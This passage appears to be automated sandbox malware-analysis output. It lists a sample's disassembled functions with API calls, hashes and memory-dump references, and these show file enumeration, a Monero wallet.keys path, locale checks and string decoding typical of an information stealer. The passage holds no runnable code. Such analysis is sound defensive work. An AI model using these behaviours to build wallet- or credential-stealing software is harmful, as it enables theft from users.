                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 1415058207-1173974218
                            • Opcode ID: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                            • Instruction ID: 3a0518717faf1c9664d67be8a45899cd1d89ffe58afa35426af9825ce381a83b
                            • Opcode Fuzzy Hash: e8bc45e8eb5968bd0ddab93fff29ab825be0027592622213ad00f45450d1dcb5
                            • Instruction Fuzzy Hash: 7A12DD719246189BDF1AFB60CC96EEE7778AF54300F404299B50A6A091EF306F89DFD1
                            Function 0038DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,003A0C2E), ref: 0038DE5E
                            • StrCmpCA.SHLWAPI(?,003A14C8), ref: 0038DEAE
                            • StrCmpCA.SHLWAPI(?,003A14CC), ref: 0038DEC4
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038E3E0
                            • FindClose.KERNEL32(000000FF), ref: 0038E3F2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                            • String ID: \*.*
                            • API String ID: 2325840235-1173974218
                            • Opcode ID: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                            • Instruction ID: 657f861a02882f2d322ce1ba1b83a16218c053819411782396eb43c43196ee86
                            • Opcode Fuzzy Hash: 6025f25a974ae067bda761f99ef03d728629f531ca7113b1f7625fa69c7074e0
                            • Instruction Fuzzy Hash: 18F180718246289ADF17FB60DC95EEE7778BF54300F5042D9A40A66091EF306F8ADF91
                            Function 0038DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003A14B0,003A0C2A), ref: 0038DAEB
                            • StrCmpCA.SHLWAPI(?,003A14B4), ref: 0038DB33
                            • StrCmpCA.SHLWAPI(?,003A14B8), ref: 0038DB49
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038DDCC
                            • FindClose.KERNEL32(000000FF), ref: 0038DDDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                            • Instruction ID: 22a5c966a220b8164038bfbea6eca7a428759c6bdf09bc6190cb3fb49b186b33
                            • Opcode Fuzzy Hash: 4352db75c054b5525481e408a03103b11c45386ef412d974057e4cdbda4ac861
                            • Instruction Fuzzy Hash: 369124729106189BDF16FBB0EC56DED777DAF94300F408658F90A9A181EE349B0D8BD2
                            Function 00750949 Relevance: 11.7, Strings: 8, Instructions: 1721COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !m_$!Bgk$&`vf$&`vf$FEur$LEw{$aQ0:$y[q
                            • API String ID: 0-1856721911
                            • Opcode ID: 14cfc3f1a6c7edd4ede8ef979387953f43050d4765a76f04ac544284c4db0088
                            • Instruction ID: 7ac733699ab3a01897b44b1b5e8c83d70fc28c93c663d662a080433dd23873d7
                            • Opcode Fuzzy Hash: 14cfc3f1a6c7edd4ede8ef979387953f43050d4765a76f04ac544284c4db0088
                            • Instruction Fuzzy Hash: 71B219F360C2049FE3046E2DEC8567AFBE9EF94720F1A463DEAC4C3744EA7558058696
                            Function 00748566 Relevance: 11.6, Strings: 8, Instructions: 1605COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: no?$'`?$+:lg$:[=[$_"$_E?$rZuy$z]?S
                            • API String ID: 0-3699099736
                            • Opcode ID: 4fe426dc953ef8a303e519667bf635b0bd95278b17d6d800465cc2fc1d49e670
                            • Instruction ID: 6ce4a91454515691e119380bb8baf5eb4f2a57eae0bb7c8adb1473e51ca0d91f
                            • Opcode Fuzzy Hash: 4fe426dc953ef8a303e519667bf635b0bd95278b17d6d800465cc2fc1d49e670
                            • Instruction Fuzzy Hash: 80B219F3A08200AFE304AE2DEC8567AB7E9EF94720F1A453DE6C5C7744EA3558058797
                            Function 0075403D Relevance: 11.6, Strings: 8, Instructions: 1564COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &a{?$2\e$:,x$<5|+$C2~w$Sio=$^.~$u}
                            • API String ID: 0-2510878995
                            • Opcode ID: 1bbd8a41cec596eca1a57e5a2de920806fa6141c34f0a2ad2abe0c8b7f529a76
                            • Instruction ID: baecc14b48d7ced702ab2c8d72e2c54a32d37bf489292e07bb59a09e4f8946f2
                            • Opcode Fuzzy Hash: 1bbd8a41cec596eca1a57e5a2de920806fa6141c34f0a2ad2abe0c8b7f529a76
                            • Instruction Fuzzy Hash: ACA2F8F3A0C2009FE3046E2DEC8567ABBE9EF94720F16893DEAC4C7744E67558058697
                            Function 00397B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • GetKeyboardLayoutList.USER32(00000000,00000000,003A05AF), ref: 00397BE1
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00397BF9
                            • GetKeyboardLayoutList.USER32(?,00000000), ref: 00397C0D
                            • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00397C62
                            • LocalFree.KERNEL32(00000000), ref: 00397D22
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                            • String ID: /
                            • API String ID: 3090951853-4001269591
                            • Opcode ID: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                            • Instruction ID: 80e97e073348eac0fe9352ec6d92739cfdacc90ccade130b803cc1e2d0414caf
                            • Opcode Fuzzy Hash: e13667c04cfc850577ac91fdb1150bd9d1f2ad6aabe688eaae2bccbd9f1c4d0d
                            • Instruction Fuzzy Hash: 5A415A7191062CABDF25DB94DC99BEEB7B8FF44700F204299E00966180DB342F89CFA1
                            Function 00755DB5 Relevance: 10.0, Strings: 7, Instructions: 1287COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: %-]~$Gu}$aa?:$q<=$q<=$g{$!6t
                            • API String ID: 0-2122644379
                            • Opcode ID: 16d4062ef4f9b1e01738cef17e70eb629c3959dd3236327e5b299e93c5346b7d
                            • Instruction ID: 1ba0e817f022a031a7d998290648818f35687f2ddf4eeb3fa6df4140a8eb175a
                            • Opcode Fuzzy Hash: 16d4062ef4f9b1e01738cef17e70eb629c3959dd3236327e5b299e93c5346b7d
                            • Instruction Fuzzy Hash: 9C9204F360C2009FE308AF29EC8567ABBE9EF94720F16493DEAC487744E63558458797
                            Function 0038E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,003A0D73), ref: 0038E4A2
                            • StrCmpCA.SHLWAPI(?,003A14F8), ref: 0038E4F2
                            • StrCmpCA.SHLWAPI(?,003A14FC), ref: 0038E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0038EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                            • Instruction ID: 9a79cb98fdb2171a009494959310fdda1a216af0c902e4b15f9f8e1ccd601a32
                            • Opcode Fuzzy Hash: 8e3ef79709e35466cc41d15fda64aeca2a5a074b24679d1d4ccd318790550f51
                            • Instruction Fuzzy Hash: 2D1231719106189BDF1AFBA0DC96EED7778AF54300F4046A8B50A9A091EF306F49CFD2
                            Function 00389AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                            • LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: N8
                            • API String ID: 4291131564-2731101833
                            • Opcode ID: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                            • Instruction ID: f8444c4544b980b999141e07d1bf4384ce49e32a21bf69f7758c6885d4c407b2
                            • Opcode Fuzzy Hash: a513bb502861d5604315c42a6171bbd5164c24673da477becab628df20bf6783
                            • Instruction Fuzzy Hash: C911D2B4241308EFEB01CF64CC95FAA77B5FB89704F208089F9159B390C7B2AA01DB90
                            Function 0074BA0F Relevance: 7.9, Strings: 5, Instructions: 1605COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0|-$jD% $jX{0$q(_>$w=
                            • API String ID: 0-1819484939
